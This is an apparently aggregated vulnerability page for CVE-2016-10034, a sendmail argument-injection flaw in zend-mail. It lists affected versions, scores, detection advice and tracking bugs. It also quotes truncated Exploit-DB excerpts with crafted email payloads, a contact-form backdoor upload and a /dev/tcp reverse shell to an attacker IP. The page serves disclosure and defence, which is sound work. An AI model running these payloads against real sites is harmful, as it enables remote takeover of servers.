CVE-2016-10034
published 2016-12-30CVE-2016-10034: The setFrom function in the Sendmail adapter in the zend-mail component before 2.4.11, 2.5.x, 2.6.x, and 2.7.x before 2.7.2, and Zend Framework before 2.4.11…
PriorityP275critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
38.44%
98.4th percentile
The setFrom function in the Sendmail adapter in the zend-mail component before 2.4.11, 2.5.x, 2.6.x, and 2.7.x before 2.7.2, and Zend Framework before 2.4.11 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a \" (backslash double quote) in a crafted e-mail address.
Affected
14 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| zend | zend-mail | <= 2.4.10 | — |
| zend | zend-mail | — | — |
| zend | zend-mail | — | — |
| zend | zend-mail | — | — |
| zend | zend-mail | — | — |
| zend | zend-mail | — | — |
| zend | zend-mail | — | — |
| zend | zend-mail | — | — |
| zend | zend-mail | — | — |
| zend | zend_framework | <= 2.4.10 | — |
| zendframework | zend-mail | >= 0 < 2.4.11 | 2.4.11 |
| zendframework | zend-mail | 2.5 – 2.5.2 | — |
| zendframework | zend-mail | 2.6 – 2.6.2 | — |
| zendframework | zend-mail | >= 2.7 < 2.7.2 | 2.7.2 |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect email addresses containing backslash-doublequote sequences (\" ) in the From/sender field, which are used to inject extra parameters into the sendmail command. ↗
- →Monitor for sendmail/mail process invocations that include flags such as -oQ or -X (log file path injection), which indicate successful parameter injection from a crafted From address. ↗
- →Look for outbound /dev/tcp reverse shell connections spawned from web server processes (e.g., apache, php-fpm), which are the final stage of the exploit chain. ↗
- →Inspect contact/registration form submissions for email field values containing backslash, double-quote, and flag-like strings (e.g., -oQ, -X, -be) as indicators of injection attempts. ↗
- →The vulnerability is triggered via the setFrom() function in the Zend-Mail Sendmail adapter; audit all call sites of setFrom() for unsanitized user-controlled input. ↗
- ·The vulnerability only affects the Sendmail transport adapter in zend-mail; other transports (SMTP, etc.) are not impacted. Ensure the Sendmail adapter is actually in use before prioritising this CVE. ↗
- ·Fixed versions are zend-mail >= 2.4.11 and >= 2.7.2, and Zend Framework >= 2.4.11. Detections targeting process arguments are only relevant on unpatched instances. ↗
CVSS provenance
nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
OSV
zend-mail remote code execution via Sendmail adapter
osv·2022-05-14
CVE-2016-10034 [CRITICAL] zend-mail remote code execution via Sendmail adapter
zend-mail remote code execution via Sendmail adapter
The setFrom function in the Sendmail adapter in the zend-mail component before 2.4.11, 2.5.x, 2.6.x, and 2.7.x before 2.7.2, and Zend Framework before 2.4.11 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a \" (backslash double quote) in a crafted e-mail address.
GHSA
zend-mail remote code execution via Sendmail adapter
ghsa·2022-05-14
CVE-2016-10034 [CRITICAL] CWE-77 zend-mail remote code execution via Sendmail adapter
zend-mail remote code execution via Sendmail adapter
The setFrom function in the Sendmail adapter in the zend-mail component before 2.4.11, 2.5.x, 2.6.x, and 2.7.x before 2.7.2, and Zend Framework before 2.4.11 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a \" (backslash double quote) in a crafted e-mail address.
No detection rules found.
Exploit-DB
PHPMailer < 5.2.20 with Exim MTA - Remote Code Execution
exploitdb·2017-06-21·CVSS 9.8
CVE-2016-10074 [CRITICAL] PHPMailer < 5.2.20 with Exim MTA - Remote Code Execution
PHPMailer 2):
print "No such target. Exiting\n"
exit(3)
################################
# Payload
################################
cmd = "/bin/bash -c '0/dev/tcp/%s/%s;nohup sh &196 2>&196 &'" % (args.ATTACKER_IP, args.ATTACKER_PORT)
prepared_cmd = prepare_cmd(cmd)
payload = '"a\\" -be ' + prepared_cmd + ' "@a.co'
# Update payloads for PHPMailer bypass (PHPMailer < 5.2.20)
if target == 2:
payload = "\"a\\' -be " + prepared_cmd + " \"@a.co"
################################
# Attack episode
# This step will execute the reverse shell
################################
# Form fields
post_fields = {'action': "%s" % args.POST_ACTION, "%s" % args.POST_NAME: 'Jas Fasola', "%s" % args.POST_EMAIL: payload, "%s" % args.POST_MSG: 'Really important message'}
# Print relevant information
print "\n[
Exploit-DB
PHPMailer < 5.2.20 / SwiftMailer < 5.4.5-DEV / Zend Framework / zend-mail < 2.4.11 - 'AIO' 'PwnScriptum' Remote Code Execution
exploitdb·2017-01-02·CVSS 9.8
CVE-2016-10074 [CRITICAL] PHPMailer < 5.2.20 / SwiftMailer < 5.4.5-DEV / Zend Framework / zend-mail < 2.4.11 - 'AIO' 'PwnScriptum' Remote Code Execution
PHPMailer 4):
print "No such target. Exiting\n"
exit(3)
if target == 1:
# PHPMailer "
RCE_PHP_CODE = """/dev/tcp/%s/%s 0&1' "); ?>""" % (TMOUT, args.ATTACKERS_IP, args.ATTACKERS_PORT)
# The form names might need to be adjusted
post_fields = {'action': "%s" % args.POST_ACTION, "%s" % args.POST_NAME: 'Jas Fasola', "%s" % args.POST_EMAIL: payload, "%s" % args.POST_MSG: RCE_PHP_CODE}
# Attack
# Inject payload into PHPMailer / mail() via a Contact form. This should write out the backdoor
print "[+] Backdoor upload via the contact form at '%s'\n" % CONTACT_SCRIPT_URL
data = urllib.urlencode(post_fields)
req = urllib2.Request(CONTACT_SCRIPT_URL, data)
response = urllib2.urlopen(req)
the_page = response.read()
# Check if the backdoor was uploaded correctly.
# A little trick here. The urlopen s
Exploit-DB
Zend Framework / zend-mail < 2.4.11 - Remote Code Execution
exploitdb·2016-12-30·CVSS 9.8
CVE-2016-10034 [CRITICAL] Zend Framework / zend-mail < 2.4.11 - Remote Code Execution
Zend Framework / zend-mail
09607 array(
'autoregister_zf' => true
)
));
Zend\Mvc\Application::init(require 'config/application.php')->run();
$message = new \Zend\Mail\Message();
$message->setBody($msg_body);
$message->setFrom($email_from, 'Attacker');
$message->addTo('support@localhost', 'Support');
$message->setSubject('Zend PoC');
$transport = new \Zend\Mail\Transport\Sendmail();
$transport->send($message);
?>
HackerOne
Directory Disclose,Email Disclose Zendmail vulnerability
hackerone·2017-06-21·CVSS 9.8
[CRITICAL] Directory Disclose,Email Disclose Zendmail vulnerability
Directory Disclose,Email Disclose Zendmail vulnerability
i found three vulnerability
Directory information disclose,Email address disclose, and possible Remote code execution in Zendmail
during signup your code accept username with ',",/,@ while all of the special character must be forbidden or encoded in username
Directory Disclose:
1. goto sign-up page and create a account with username with double quote like as"
2. signin and goto ur account and add email address, then logout
3.goto Forgot-Password section and enter username of above ( as" )
4.and see full path of server has been disclose (screenshot: directory.png)
Email address Disclose
if you look close to screenshot below that email address of the user also disclose
Zendmail rce
from the above screenshot, ur are using zendmail f
Bugzilla
CVE-2016-10034 php-zendframework-zend-mail: php-zendframework: Parameter injection in setFrom() function [fedora-all]
bugzilla·2017-01-02·CVSS 9.8
CVE-2016-10034 [CRITICAL] CVE-2016-10034 php-zendframework-zend-mail: php-zendframework: Parameter injection in setFrom() function [fedora-all]
CVE-2016-10034 php-zendframework-zend-mail: php-zendframework: Parameter injection in setFrom() function [fedora-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of Fedora.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: this issue
Bugzilla
CVE-2016-10034 php-ZendFramework: Parameter injection in setFrom() function [fedora-all]
bugzilla·2017-01-02·CVSS 9.8
CVE-2016-10034 [CRITICAL] CVE-2016-10034 php-ZendFramework: Parameter injection in setFrom() function [fedora-all]
CVE-2016-10034 php-ZendFramework: Parameter injection in setFrom() function [fedora-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of Fedora.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: this issue affects multiple supported v
Bugzilla
CVE-2016-10034 php-ZendFramework: Parameter injection in setFrom() function [epel-all]
bugzilla·2017-01-02·CVSS 9.8
CVE-2016-10034 [CRITICAL] CVE-2016-10034 php-ZendFramework: Parameter injection in setFrom() function [epel-all]
CVE-2016-10034 php-ZendFramework: Parameter injection in setFrom() function [epel-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of Fedora EPEL.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: this issue affects multiple supporte
Bugzilla
CVE-2016-10034 php-ZendFramework2: php-zendframework: Parameter injection in setFrom() function [epel-all]
bugzilla·2017-01-02·CVSS 9.8
CVE-2016-10034 [CRITICAL] CVE-2016-10034 php-ZendFramework2: php-zendframework: Parameter injection in setFrom() function [epel-all]
CVE-2016-10034 php-ZendFramework2: php-zendframework: Parameter injection in setFrom() function [epel-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of Fedora EPEL.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: this issue affec
Bugzilla
CVE-2016-10034 php-zendframework: Parameter injection in setFrom() function
bugzilla·2017-01-02·CVSS 9.8
CVE-2016-10034 [CRITICAL] CVE-2016-10034 php-zendframework: Parameter injection in setFrom() function
CVE-2016-10034 php-zendframework: Parameter injection in setFrom() function
The setFrom function in the Sendmail adapter in the zend-mail
component before 2.4.11, 2.5.x, 2.6.x, and 2.7.x before 2.7.2, and
Zend Framework before 2.4.11 might allow remote attackers to pass
extra parameters to the mail command and consequently execute
arbitrary code via a \" (backslash double quote) in a crafted e-mail
address.
References:
http://seclists.org/oss-sec/2016/q4/780
http://legalhackers.com/advisories/ZendFramework-Exploit-ZendMail-Remote-Code-Exec-CVE-2016-10034-Vuln.html
Discussion:
Created php-zendframework-zend-mail tracking bugs for this issue:
Affects: fedora-all [bug 1409593]
---
Created php-ZendFramework2 tracking bugs for this issue:
Affects: epel-all [bug 1409594]
---
Created p
http://www.securityfocus.com/bid/95144http://www.securitytracker.com/id/1037539https://framework.zend.com/security/advisory/ZF2016-04https://legalhackers.com/advisories/ZendFramework-Exploit-ZendMail-Remote-Code-Exec-CVE-2016-10034-Vuln.htmlhttps://security.gentoo.org/glsa/201804-10https://www.exploit-db.com/exploits/40979/https://www.exploit-db.com/exploits/40986/https://www.exploit-db.com/exploits/42221/http://www.securityfocus.com/bid/95144http://www.securitytracker.com/id/1037539https://framework.zend.com/security/advisory/ZF2016-04https://legalhackers.com/advisories/ZendFramework-Exploit-ZendMail-Remote-Code-Exec-CVE-2016-10034-Vuln.htmlhttps://security.gentoo.org/glsa/201804-10https://www.exploit-db.com/exploits/40979/https://www.exploit-db.com/exploits/40986/https://www.exploit-db.com/exploits/42221/
2016-12-30
Published